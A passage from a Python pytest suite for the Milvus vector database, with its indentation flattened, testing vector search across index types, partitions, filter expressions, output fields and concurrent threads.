"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, 5000,
partition_num=1,
auto_id=auto_id,
dim=dim, is_index=True)[0:5]
# 2. create index and load
if params.get("m"):
if (dim % params["m"]) != 0:
params["m"] = dim // 4
if params.get("PQM"):
if (dim % params["PQM"]) != 0:
params["PQM"] = dim // 4
default_index = {"index_type": index, "params": params, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search
search_params = cf.gen_search_param(index)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
for search_param in search_params:
log.info("Searching with search params: {}".format(search_param))
collection_w.search(vectors[:default_nq], default_search_field,
search_param, default_limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_after_index_different_metric_type(self, dim, index, params, auto_id, _async):
"""
target: test search with different metric type
method: test search with different metric type
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, 5000,
partition_num=1,
auto_id=auto_id,
dim=dim, is_index=True)[0:5]
# 2. create different index
if params.get("m"):
if (dim % params["m"]) != 0:
params["m"] = dim // 4
if params.get("PQM"):
if (dim % params["PQM"]) != 0:
params["PQM"] = dim // 4
log.info("test_search_after_index_different_metric_type: Creating index-%s" % index)
default_index = {"index_type": index, "params": params, "metric_type": "IP"}
collection_w.create_index("float_vector", default_index)
log.info("test_search_after_index_different_metric_type: Created index-%s" % index)
collection_w.load()
# 3. search
search_params = cf.gen_search_param(index, "IP")
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
for search_param in search_params:
log.info("Searching with search params: {}".format(search_param))
collection_w.search(vectors[:default_nq], default_search_field,
search_param, default_limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_collection_multiple_times(self, nb, nq, dim, auto_id, _async):
"""
target: test search for multiple times
method: search for multiple times
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search for multiple times
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
for i in range(search_num):
log.info("test_search_collection_multiple_times: searching round %d" % (i + 1))
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_sync_async_multiple_times(self, nb, nq, dim, auto_id):
"""
target: test async search after sync search case
method: create connection, collection, insert,
sync search and async search
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:5]
# 2. search
log.info("test_search_sync_async_multiple_times: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
for i in range(search_num):
log.info("test_search_sync_async_multiple_times: searching round %d" % (i + 1))
for _async in [False, True]:
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_multiple_vectors(self, nb, nq, dim, auto_id, _async):
"""
target: test search with multiple vectors
method: create connection, collection with multiple
vectors, insert and search
expected: search successfully with limit(topK)
"""
# 1. connect
self._connect()
# 2. create collection with multiple vectors
c_name = cf.gen_unique_str(prefix)
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_field(),
cf.gen_float_vec_field(dim=dim), cf.gen_float_vec_field(name="tmp", dim=dim)]
schema = cf.gen_collection_schema(fields=fields, auto_id=auto_id)
collection_w = self.collection_wrap.init_collection(c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={"name": c_name, "schema": schema})[0]
# 3. insert
vectors = [[random.random() for _ in range(dim)] for _ in range(nb)]
vectors_tmp = [[random.random() for _ in range(dim)] for _ in range(nb)]
data = [[i for i in range(nb)], [np.float32(i) for i in range(nb)], vectors, vectors_tmp]
if auto_id:
data = [[np.float32(i) for i in range(nb)], vectors, vectors_tmp]
res = collection_w.insert(data)
insert_ids = res.primary_keys
assert collection_w.num_entities == nb
# 4. load
collection_w.load()
# 5. search all the vectors
log.info("test_search_multiple_vectors: searching collection %s" % collection_w.name)
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
collection_w.search(vectors[:nq], "tmp",
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L1)
def test_search_index_one_partition(self, nb, auto_id, _async):
"""
target: test search from partition
method: search from one partition
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
partition_num=1,
auto_id=auto_id,
is_index=True)[0:5]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search in one partition
log.info("test_search_index_one_partition: searching (1000 entities) through one partition")
limit = 1000
par = collection_w.partitions
if limit > par[1].num_entities:
limit_check = par[1].num_entities
else:
limit_check = limit
search_params = {"metric_type": "L2", "params": {"nprobe": 128}}
collection_w.search(vectors[:default_nq], default_search_field,
search_params, limit, default_search_exp,
[par[1].name], _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids[par[0].num_entities:],
"limit": limit_check,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_partitions(self, nb, nq, dim, auto_id, _async):
"""
target: test search from partitions
method: search from partitions
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num=1,
auto_id=auto_id,
dim=dim,
is_index=True)[0:4]
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search through partitions
log.info("test_search_index_partitions: searching (1000 entities) through partitions")
par = collection_w.partitions
log.info("test_search_index_partitions: partitions: %s" % par)
limit = 1000
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit, default_search_exp,
[par[0].name, par[1].name], _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("partition_names",
[["(.*)"], ["search(.*)"]])
def test_search_index_partitions_fuzzy(self, nb, nq, dim, partition_names, auto_id, _async):
"""
target: test search from partitions
method: search from partitions with fuzzy
partition name
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num=1,
auto_id=auto_id,
dim=dim)[0:4]
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 3. search through partitions
log.info("test_search_index_partitions_fuzzy: searching through partitions")
limit = 1000
limit_check = limit
par = collection_w.partitions
if partition_names == ["search(.*)"]:
insert_ids = insert_ids[par[0].num_entities:]
if limit > par[1].num_entities:
limit_check = par[1].num_entities
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit, default_search_exp,
partition_names, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit_check,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_partition_empty(self, nq, dim, auto_id, _async):
"""
target: test search the empty partition
method: search from the empty partition
expected: searched successfully with 0 results
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True, auto_id=auto_id,
dim=dim, is_index=True)[0]
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
# 2. create empty partition
partition_name = "search_partition_empty"
collection_w.create_partition(partition_name=partition_name, description="search partition empty")
par = collection_w.partitions
log.info("test_search_index_partition_empty: partitions: %s" % par)
collection_w.load()
# 3. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 4. search the empty partition
log.info("test_search_index_partition_empty: searching %s "
"entities through empty partition" % default_limit)
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, [partition_name],
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": [],
"limit": 0,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index", ["BIN_FLAT", "BIN_IVF_FLAT"])
def test_search_binary_jaccard_flat_index(self, nq, dim, auto_id, _async, index):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with JACCARD
expected: the return distance equals to the computed value
"""
# 1. initialize with binary data
collection_w, _, binary_raw_vector, insert_ids, time_stamp = self.init_collection_general(prefix, True, 2,
is_binary=True,
auto_id=auto_id,
dim=dim,
is_index=True)[0:5]
# 2. create index
default_index = {"index_type": index, "params": {"nlist": 128}, "metric_type": "JACCARD"}
collection_w.create_index("binary_vector", default_index)
collection_w.load()
# 3. compute the distance
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, dim)
distance_0 = cf.jaccard(query_raw_vector[0], binary_raw_vector[0])
distance_1 = cf.jaccard(query_raw_vector[0], binary_raw_vector[1])
# 4. search and compare the distance
search_params = {"metric_type": "JACCARD", "params": {"nprobe": 10}}
res = collection_w.search(binary_vectors[:nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
_async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": 2,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert abs(res[0].distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index", ["BIN_FLAT", "BIN_IVF_FLAT"])
def test_search_binary_hamming_flat_index(self, nq, dim, auto_id, _async, index):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with HAMMING
expected: the return distance equals to the computed value
"""
# 1. initialize with binary data
collection_w, _, binary_raw_vector, insert_ids = self.init_collection_general(prefix, True, 2,
is_binary=True,
auto_id=auto_id,
dim=dim,
is_index=True)[0:4]
# 2. create index
default_index = {"index_type": index, "params": {"nlist": 128}, "metric_type": "HAMMING"}
collection_w.create_index("binary_vector", default_index)
# 3. compute the distance
collection_w.load()
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, dim)
distance_0 = cf.hamming(query_raw_vector[0], binary_raw_vector[0])
distance_1 = cf.hamming(query_raw_vector[0], binary_raw_vector[1])
# 4. search and compare the distance
search_params = {"metric_type": "HAMMING", "params": {"nprobe": 10}}
res = collection_w.search(binary_vectors[:nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": 2,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert abs(res[0].distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 6843")
@pytest.mark.parametrize("index", ["BIN_FLAT", "BIN_IVF_FLAT"])
def test_search_binary_tanimoto_flat_index(self, nq, dim, auto_id, _async, index):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with TANIMOTO
expected: the return distance equals to the computed value
"""
# 1. initialize with binary data
collection_w, _, binary_raw_vector, insert_ids = self.init_collection_general(prefix, True, 2,
is_binary=True,
auto_id=auto_id,
dim=dim,
is_index=True)[0:4]
log.info("auto_id= %s, _async= %s" % (auto_id, _async))
# 2. create index
default_index = {"index_type": index, "params": {"nlist": 128}, "metric_type": "TANIMOTO"}
collection_w.create_index("binary_vector", default_index)
collection_w.load()
# 3. compute the distance
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, dim)
distance_0 = cf.tanimoto(query_raw_vector[0], binary_raw_vector[0])
distance_1 = cf.tanimoto(query_raw_vector[0], binary_raw_vector[1])
# 4. search and compare the distance
search_params = {"metric_type": "TANIMOTO", "params": {"nprobe": 10}}
res = collection_w.search(binary_vectors[:nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": 2,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert abs(res[0].distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("expression", cf.gen_normal_expressions())
def test_search_with_expression(self, dim, expression, _async):
"""
target: test search with different expressions
method: test search with different expressions
expected: searched successfully with correct limit(topK)
"""
# 1. initialize with data
nb = 1000
collection_w, _vectors, _, insert_ids = self.init_collection_general(prefix, True,
nb, dim=dim,
is_index=True)[0:4]
# filter result with expression in collection
_vectors = _vectors[0]
expression = expression.replace("&&", "and").replace("||", "or")
filter_ids = []
for i, _id in enumerate(insert_ids):
int64 = _vectors.int64[i]
float = _vectors.float[i]
if not expression or eval(expression):
filter_ids.append(_id)
# 2. create index
index_param = {"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}}
collection_w.create_index("float_vector", index_param)
collection_w.load()
# 3. search with expression
log.info("test_search_with_expression: searching with expression: %s" % expression)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
search_res, _ = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, nb, expression,
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": min(nb, len(filter_ids)),
"_async": _async})
if _async:
search_res.done()
search_res = search_res.result()
filter_ids_set = set(filter_ids)
for hits in search_res:
ids = hits.ids
assert set(ids).issubset(filter_ids_set)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 7910")
@pytest.mark.parametrize("bool_type", [True, False, "true", "false", 1, 0, 2])
def test_search_with_expression_bool(self, dim, auto_id, _async, bool_type):
"""
target: test search with different bool expressions
method: search with different bool expressions
expected: searched successfully with correct limit(topK)
"""
# 1. initialize with data
nb = 1000
collection_w, _vectors, _, insert_ids = self.init_collection_general(prefix, True, nb,
is_all_data_type=True,
auto_id=auto_id,
dim=dim)[0:4]
# 2. create index
index_param = {"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}}
collection_w.create_index("float_vector", index_param)
collection_w.load()
# 3. filter result with expression in collection
filter_ids = []
bool_type_cmp = bool_type
if bool_type == "true":
bool_type_cmp = True
if bool_type == "false":
bool_type_cmp = False
for i, _id in enumerate(insert_ids):
if _vectors[0][f"{default_bool_field_name}"][i] == bool_type_cmp:
filter_ids.append(_id)
# 4. search with different expressions
expression = f"{default_bool_field_name} == {bool_type}"
log.info("test_search_with_expression: searching with expression: %s" % expression)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
search_res, _ = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, nb, expression,
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": min(nb, len(filter_ids)),
"_async": _async})
if _async:
search_res.done()
search_res = search_res.result()
filter_ids_set = set(filter_ids)
for hits in search_res:
ids = hits.ids
assert set(ids).issubset(filter_ids_set)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("expression", cf.gen_normal_expressions_field(default_float_field_name))
def test_search_with_expression_auto_id(self, dim, expression, _async):
"""
target: test search with different expressions
method: test search with different expressions
expected: searched successfully with correct limit(topK)
"""
# 1. initialize with data
nb = 1000
collection_w, _vectors, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=True,
dim=dim,
is_index=True)[0:4]
# filter result with expression in collection
_vectors = _vectors[0]
expression = expression.replace("&&", "and").replace("||", "or")
filter_ids = []
for i, _id in enumerate(insert_ids):
exec(f"{default_float_field_name} = _vectors.{default_float_field_name}[i]")
if not expression or eval(expression):
filter_ids.append(_id)
# 2. create index
index_param = {"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}}
collection_w.create_index("float_vector", index_param)
collection_w.load()
# 3. search with different expressions
log.info("test_search_with_expression: searching with expression: %s" % expression)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
search_res, _ = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, nb, expression,
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": min(nb, len(filter_ids)),
"_async": _async})
if _async:
search_res.done()
search_res = search_res.result()
filter_ids_set = set(filter_ids)
for hits in search_res:
ids = hits.ids
assert set(ids).issubset(filter_ids_set)
@pytest.mark.tags(CaseLabel.L2)
def test_search_expression_all_data_type(self, nb, nq, dim, auto_id, _async):
"""
target: test search using different supported data type
method: search using different supported data type
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
is_all_data_type=True,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search
log.info("test_search_expression_all_data_type: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
search_exp = "int64 >= 0 && int32 >= 0 && int16 >= 0 " \
"&& int8 >= 0 && float >= 0 && double >= 0"
res = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
search_exp, _async=_async,
output_fields=[default_int64_field_name,
default_float_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
assert (default_int64_field_name and default_float_field_name) in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_output_fields_empty(self, nb, nq, dim, auto_id, _async):
"""
target: test search with output fields
method: search with empty output_field
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search
log.info("test_search_with_output_fields_empty: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
res = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=[],
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) == 0
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_output_field(self, auto_id, _async):
"""
target: test search with output fields
method: search with one output_field
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True,
auto_id=auto_id)[0:4]
# 2. search
log.info("test_search_with_output_field: Searching collection %s" % collection_w.name)
res = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=[default_int64_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
assert default_int64_field_name in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_output_fields(self, nb, nq, dim, auto_id, _async):
"""
target: test search with output fields
method: search with multiple output_field
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
is_all_data_type=True,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search
log.info("test_search_with_output_fields: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
res = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=[default_int64_field_name,
default_float_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
assert (default_int64_field_name and default_float_field_name) in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("output_fields", [["*"], ["*", default_float_field_name]])
def test_search_with_output_field_wildcard(self, output_fields, auto_id, _async):
"""
target: test search with output fields using wildcard
method: search with one output_field (wildcard)
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True,
auto_id=auto_id)[0:4]
# 2. search
log.info("test_search_with_output_field_wildcard: Searching collection %s" % collection_w.name)
res = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=output_fields,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
assert (default_int64_field_name and default_float_field_name) in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
def test_search_multi_collections(self, nb, nq, dim, auto_id, _async):
"""
target: test search multi collections of L2
method: add vectors into 10 collections, and search
expected: search status ok, the length of result
"""
self._connect()
collection_num = 10
for i in range(collection_num):
# 1. initialize with data
log.info("test_search_multi_collections: search round %d" % (i + 1))
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_multi_collections: searching %s entities (nq = %s) from collection %s" %
(default_limit, nq, collection_w.name))
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_concurrent_multi_threads(self, nb, nq, dim, auto_id, _async):
"""
target: test concurrent search with multi-processes
method: search with 10 processes, each process uses dependent connection
expected: status ok and the returned vectors should be query_records
"""
# 1. initialize with data
threads_num = 10
threads = []
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:5]
def search(collection_w):
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
# 2. search with multi-processes
log.info("test_search_concurrent_multi_threads: searching with %s processes" % threads_num)
for i in range(threads_num):
t = threading.Thread(target=search, args=(collection_w,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
"""
******************************************************************
# The following cases are copied from test_search.py
******************************************************************
"""
def init_data(connect, collection, nb=3000, partition_names=None, auto_id=True):
"""
Generate entities and add it in collection
"""
global entities
if nb == 3000:
insert_entities = entities
else:
insert_entities = gen_entities(nb, is_normal=True)
if partition_names is None:
res = connect.insert(collection, insert_entities)
else:
res = connect.insert(collection, insert_entities, partition_name=partition_names)
connect.flush([collection])
ids = res.primary_keys
return insert_entities, ids
def init_binary_data(connect, collection, nb=3000, insert=True, partition_names=None):
"""
Generate entities and add it in collection
"""
ids = []
global binary_entities
global raw_vectors
if nb == 3000:
insert_entities = binary_entities
insert_raw_vectors = raw_vectors
else:
insert_raw_vectors, insert_entities = gen_binary_entities(nb)
if insert is True:
if partition_names is None:
res = connect.insert(collection, insert_entities)
else:
res = connect.insert(collection, insert_entities, partition_name=partition_names)
connect.flush([collection])
ids = res.primary_keys
return insert_raw_vectors, insert_entities, ids
def check_id_result(result, id):
limit_in = 5
ids = [entity.id for entity in result]
if len(result) >= limit_in:
return id in ids[:limit_in]
else:
return id in ids
class TestSearchBase:
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
# else:
# pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_hamming_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
# else:
# pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_structure_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == "FLAT":
return request.param
# else:
# pytest.skip("Skip index Temporary")
"""
generate top-k params
"""
@pytest.fixture(
scope="function",
params=[1, 10]
)
def get_top_k(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=[1, 10, 1100]
)
def get_nq(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_search_flat_top_k(self, connect, collection, get_nq):
"""
target: test basic search function, all the search params is correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
"""
top_k = 16385 # max top k is 16384
nq = get_nq
entities, ids = init_data(connect, collection)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq)
if top_k <= max_top_k:
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res[0]) == top_k
assert res[0]._distances[0] <= epsilon
assert check_id_result(res[0], ids[0])
else:
with pytest.raises(Exception) as e:
res = connect.search(collection, **query)
@pytest.mark.skip("r0.3-test")
def _test_search_field(self, connect, collection, get_top_k, get_nq):
"""
target: test basic search function, all the search params is correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
"""
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq)
if top_k <= max_top_k:
connect.load_collection(collection)
res = connect.search(collection, **query, fields=["float_vector"])
assert len(res[0]) == top_k
assert res[0]._distances[0] <= epsilon
assert check_id_result(res[0], ids[0])
res = connect.search(collection, **query, fields=["float"])
for i in range(nq):
assert entities[1]["values"][:nq][i] in [r.entity.get('float') for r in res[i]]
else:
with pytest.raises(Exception):
connect.search(collection, **query)
def _test_search_after_delete(self, connect, collection, get_top_k, get_nq):
"""
target: test basic search function before and after deletion, all the search params is
correct, change top-k value.
check issue <a href="https://github.com/milvus-io/milvus/issues/4200">#4200</a>
method: search with the given vectors, check the result
expected: the deleted entities do not exist in the result.
"""
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection, nb=10000)
first_int64_value = entities[0]["values"][0]
first_vector = entities[2]["values"][0]
search_param = get_search_param("FLAT")
query, vecs = gen_search_vectors_params(field_name, entities, top_k, nq, search_params=search_param)
vecs[:] = []
vecs.append(first_vector)
res = None
if top_k > max_top_k:
with pytest.raises(Exception):
connect.search(collection, **query, fields=['int64'])
# pytest.skip("top_k value is larger than max_topp_k")
pass
else:
res = connect.search(collection, **query, fields=['int64'])
assert len(res) == 1
assert len(res[0]) >= top_k
assert res[0][0].id == ids[0]
assert res[0][0].entity.get("int64") == first_int64_value
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
connect.delete_entity_by_id(collection, ids[:1])
connect.flush([collection])
res2 = connect.search(collection, **query, fields=['int64'])
assert len(res2) == 1
assert len(res2[0]) >= top_k
assert res2[0][0].id != ids[0]
if top_k > 1:
assert res2[0][0].id == res[0][1].id
assert res2[0][0].entity.get("int64") == res[0][1].entity.get("int64")
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_empty_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
"""
target: test basic search function, all the search params is correct, test all index params, and build
method: add vectors into collection, search with the given vectors, check the result
expected: the length of the result is top_k, search collection with partition tag return empty
"""
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, **query)
else:
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
connect.release_collection(collection)
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, **query, partition_names=[default_tag])
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
